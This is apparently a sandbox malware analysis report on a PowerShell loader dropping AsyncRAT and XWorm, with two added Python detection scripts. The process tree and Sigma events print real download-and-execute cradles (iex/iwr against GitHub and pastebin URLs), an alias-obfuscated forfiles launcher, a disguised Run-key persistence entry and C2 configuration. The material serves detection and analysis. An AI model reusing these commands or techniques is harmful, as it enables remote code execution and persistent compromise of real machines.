Windows Analysis Report
cr_asm_hiddenz.ps1

Overview

General Information

Sample name: cr_asm_hiddenz.ps1
Analysis ID: 1534105
MD5: 5ed9d262e083f101c1467ee317c1bc35
SHA1: b4e9654be8db562cb78fb6c7a7ddc37579205d50
SHA256: 7282328d8678600716a8496a2036f00c5b5721a82ffab07998554cf2fad037f3
Tags: Neth3N, ps1, user-JAMESWT_MHT

Detection

AsyncRAT, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to open files direct via NTFS file id
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4700 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 3636 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • attrib.exe (PID: 5108 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • powershell.exe (PID: 5584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 508 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 2320 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • forfiles.exe (PID: 828 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4536 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1792 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7068 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
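The forfiles.exe branches of the tree above carry the only real obfuscation in the chain: `sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)`. `sal` is Set-Alias, and because `$env:OS` expands to `Windows_NT` on every NT-based Windows, the third alias is literally named Windows_NT, so `calliT(WINDOWS_NT ...)` is just `iex (iwr ...)`. The script below resolves that alias trick and flags the surrounding LOLBin and cradle patterns. It is an added example, not part of the Joe Sandbox report: the three command lines are copied from the process tree, the `$env:OS` value is an assumption, and the finding labels are the author's own.

```python
"""Resolve Set-Alias (sal) obfuscation in PowerShell command lines and flag the
download-and-execute pattern seen in the process tree above.

Added example, not part of the Joe Sandbox report. The three command lines are
copied from the report; the value of $env:OS is an assumption ("Windows_NT" on
NT-based Windows, which is what makes the alias trick work).
"""
import re

ENV = {"os": "Windows_NT"}  # assumed value of $env:OS on the victim host
BUILTIN = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}

# "sal <name> <target>" / Set-Alias / nal / New-Alias in positional form only;
# the named-parameter form (-Name/-Value) is not handled by this example.
ALIAS_RE = re.compile(r"\b(?:sal|set-alias|nal|new-alias)\s+([^\s;]+)\s+([^\s;]+)", re.I)
ENV_RE = re.compile(r"\$env:(\w+)", re.I)
URL_RE = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}/[^\s'\")]+", re.I)

# Copied from the report's process tree (PIDs 828, 5584, 316).
SAMPLES = [
    r'''"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"''',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1"',
]


def resolve_aliases(cmdline):
    """Return (deobfuscated command line, aliases defined in it).

    Steps: expand $env:NAME, collect alias definitions, delete them, then
    replace every use of an alias (and of the built-in iex/iwr) with the
    full cmdlet name. Alias names are case-insensitive, as in PowerShell.
    """
    text = ENV_RE.sub(lambda m: ENV.get(m.group(1).lower(), m.group(0)), cmdline)
    defined = {}
    for name, target in ALIAS_RE.findall(text):
        defined[name.lower()] = BUILTIN.get(target.lower(), target)
    text = ALIAS_RE.sub("", text)
    text = re.sub(r"(?<=['\"])(\s*;\s*)+", "", text)  # ';' left right after a quote
    text = re.sub(r"(\s*;\s*){2,}", "; ", text)       # collapse ';;' runs
    table = {**BUILTIN, **defined}
    token = re.compile(r"\b(" + "|".join(map(re.escape, table)) + r")\b", re.I)
    return token.sub(lambda m: table[m.group(1).lower()], text), defined


def analyze(cmdline):
    """Deobfuscate one command line and return URLs plus finding labels."""
    resolved, defined = resolve_aliases(cmdline)
    low = resolved.lower()
    findings = []
    if re.search(r"\bforfiles(?:\.exe)?\b.*\s/c\s", cmdline, re.I):
        findings.append("lolbin-proxy-exec:forfiles")   # forfiles /c runs an arbitrary command
    if defined:
        findings.append("alias-obfuscation")
    if re.search(r"-windowstyle\s+h", low):            # 'h' is accepted as a prefix of Hidden
        findings.append("hidden-window")
    if re.search(r"-executionpolicy\s+(unrestricted|bypass)", low):
        findings.append("execution-policy-override")
    if "invoke-expression" in low and "invoke-webrequest" in low:
        findings.append("download-and-execute")
    return {"resolved": resolved, "aliases": defined,
            "urls": URL_RE.findall(resolved), "findings": findings}


if __name__ == "__main__":
    for sample in SAMPLES:
        result = analyze(sample)
        print(result["findings"], result["urls"])
        print("   ", result["resolved"])
```

Run stand-alone it prints, for the forfiles line, the alias map `{fatbake: calc, callit: Invoke-Expression, windows_nt: Invoke-WebRequest}` and the resolved cradle `Invoke-Expression(Invoke-WebRequest pastebin.com/raw/sA04Mwk2 -usebasicparsing)`, which is what the "PowerShell Download and Execution Cradles" Sigma hit is reacting to. Because the alias table is rebuilt per command line, a nested layer (powershell spawning powershell with a new `sal` set) is handled by feeding each child's command line separately.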
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: XWorm
Description: Malware with a wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Extracted malware configuration (XWorm):
{"C2 url": "https://pastebin.com/raw/zNCj2Utm", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Yara matches (Source / Rule / Description / Author / Strings)

Source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp
  • JoeSecurity_AsyncRAT (Joe Security): Yara detected AsyncRAT
  • JoeSecurity_XWorm (Joe Security): Yara detected XWorm
  • JoeSecurity_GenericDownloader_1 (Joe Security): Yara detected Generic Downloader
  • Unknown_Malware_Sample_Jul17_2 (Florian Roth): Detects unknown malware sample with pastebin RAW URL
      0xb462:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
      0xa892:$s2: https://pastebin.com/raw/
      0xb415:$s3: My.Computer
      0xb3fc:$s4: MyTemplate
  • MALWARE_Win_AsyncRAT (ditekSHen): Detects AsyncRAT
      0x9fa6:$s8: Win32_ComputerSystem
      0xa5f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      0xa695:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      0xa7aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      0xad1c:$cnc4: POST / HTTP/1.1
  (6 entries in total; 5 shown)

Source: 13.2.powershell.exe.1e877e60000.2.raw.unpack
  • JoeSecurity_AsyncRAT (Joe Security): Yara detected AsyncRAT
  • JoeSecurity_XWorm (Joe Security): Yara detected XWorm
  • JoeSecurity_GenericDownloader_1 (Joe Security): Yara detected Generic Downloader
  • Unknown_Malware_Sample_Jul17_2 (Florian Roth): Detects unknown malware sample with pastebin RAW URL
      0xb462:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
      0xa892:$s2: https://pastebin.com/raw/
      0xb415:$s3: My.Computer
      0xb3fc:$s4: MyTemplate
  • MALWARE_Win_AsyncRAT (ditekSHen): Detects AsyncRAT
      0x9fa6:$s8: Win32_ComputerSystem
      0xa5f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      0xa695:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      0xa7aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      0xad1c:$cnc4: POST / HTTP/1.1
  (11 entries in total; 5 shown)
Source: amsi64_4860.amsi.csv
  • INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (ditekSHen): Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      0x9a92:$b1: ::WriteAllBytes(
      0x8197:$s1: -join
      $s4: += at 0x1943, 0x1a05, 0x5c2c, 0x7d49, 0x8033, 0x8179, 0xc1bc, 0xc23c, 0xc302, 0xc382, 0xc558, 0xc5dc
      $e4: Get-WmiObject at 0x9b2c, 0x9bce, 0xa6a5
      0xa894:$e4: Get-Process
      0xa8ec:$e4: Start-Process

Source: amsi64_5812.amsi.csv
  • INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC (ditekSHen): Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Same strings at the same offsets as amsi64_4860.amsi.csv (the two AMSI captures come from the two identical powershell.exe chains, PIDs 4860 and 5812).

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , ProcessId: 5584, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 828, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 4536, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ProcessId: 316, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 316, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline", ProcessId: 4700, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , ProcessId: 5584, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) , ProcessId: 5584, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 316, TargetFilename: C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm_hiddenz.ps1", ProcessId: 316, ProcessName: powershell.exe
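The "Registry Key set" event above is the persistence step: powershell.exe (PID 316) writes a Run value named "OneDrive File Sync" that points at a .lnk under C:\ProgramData\Microsoft OneDrive\FileSync, and the process tree shows attrib.exe (PID 5108) marking that .lnk system+hidden straight afterwards. Neither event is conclusive on its own, so the hunt below correlates them. It is an added example, not part of the Joe Sandbox report: the first two records are rebuilt from the report's event and process tree, the third is a constructed benign control, field names follow Sysmon (EventID 1 = process create, 13 = registry value set), and the heuristics and the "high/low" cut-off are the author's assumptions.

```python
"""Correlate Run-key writes with attrib.exe hiding of the target, as in the
report above. Added example, not part of the Joe Sandbox report; records are
constructed from the report's events plus one benign control, field names
follow Sysmon, and the heuristics are assumptions to tune per environment.
"""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
SCRIPT_EXT = (".lnk", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".hta")
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\([^\\]+)$", re.I)
PATH_RE = re.compile(r"(.+?\.(?:exe|lnk|ps1|vbs|js|bat|cmd|hta|dll|scr))(?:\s|$)", re.I)

EVENTS = [
    # rebuilt from the report's "Registry Key set" Sigma event (PID 316)
    {"EventID": 13, "ProcessId": 316,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync",
     "Details": r"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"},
    # rebuilt from the process tree (attrib.exe, PID 5108, child of 316)
    {"EventID": 1, "ProcessId": 5108, "ParentProcessId": 316,
     "Image": r"C:\Windows\system32\attrib.exe",
     "CommandLine": r'"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"'},
    # constructed benign control: what a real OneDrive autorun looks like (assumption)
    {"EventID": 13, "ProcessId": 7777,
     "Image": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _target_path(details):
    """Path a Run value launches: the quoted token, else the leading token that
    ends in a known extension (unquoted paths with spaces), else the first word."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:details.find('"', 1)]
    m = PATH_RE.match(details)
    return m.group(1) if m else details.split(" ", 1)[0]


def attrib_hidden_paths(events):
    """Lower-cased paths that attrib.exe marked +h or +s, mapped to the attrib PID."""
    hidden = {}
    for e in events:
        if e.get("EventID") == 1 and _basename(e.get("Image", "")) == "attrib.exe":
            cl = e.get("CommandLine", "")
            m = re.search(r'"([^"]+)"\s*$', cl)           # last quoted argument is the file
            if m and re.search(r"\s\+[sh]\b", cl):
                hidden[m.group(1).lower()] = e.get("ProcessId")
    return hidden


def verdict(n):
    return "high" if n >= 3 else "low" if n else "none"


def score_run_key(event, hidden):
    """Findings for one registry-set event, or None if it is not a Run/RunOnce write."""
    if event.get("EventID") != 13:
        return None
    m = RUN_KEY_RE.search(event.get("TargetObject", ""))
    if not m:
        return None
    value_name = m.group(2)
    target = _target_path(event.get("Details", ""))
    low = target.lower()
    findings = []
    if _basename(event.get("Image", "")) in SCRIPT_HOSTS:
        findings.append("written-by-script-host")
    if low.endswith(SCRIPT_EXT):
        findings.append("target-is-script-or-shortcut")
    if any(d in low for d in USER_WRITABLE):
        findings.append("target-in-user-writable-dir")
    if low in hidden:
        findings.append("target-hidden-by-attrib")
    # heuristic: value name borrows a vendor name but does not launch that vendor's binary
    if "onedrive" in value_name.lower() and _basename(target) != "onedrive.exe":
        findings.append("vendor-name-mimicry")
    return {"value": value_name, "target": target,
            "findings": findings, "verdict": verdict(len(findings))}


def hunt(events):
    hidden = attrib_hidden_paths(events)
    return [r for r in (score_run_key(e, hidden) for e in events) if r]


if __name__ == "__main__":
    for r in hunt(EVENTS):
        print(r["verdict"], r["value"], "->", r["target"], r["findings"])
```

The malicious record collects five findings (script-host writer, .lnk target, ProgramData location, hidden by attrib, OneDrive name without OneDrive.exe) and rates "high"; the genuine OneDrive autorun also lives under AppData and so trips the user-writable check, but nothing else, which is why a single indicator is only "low". On a real estate the `hidden` map should be keyed per user session and bounded in time, since attrib.exe and the Run-key write here are seconds apart under the same parent.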

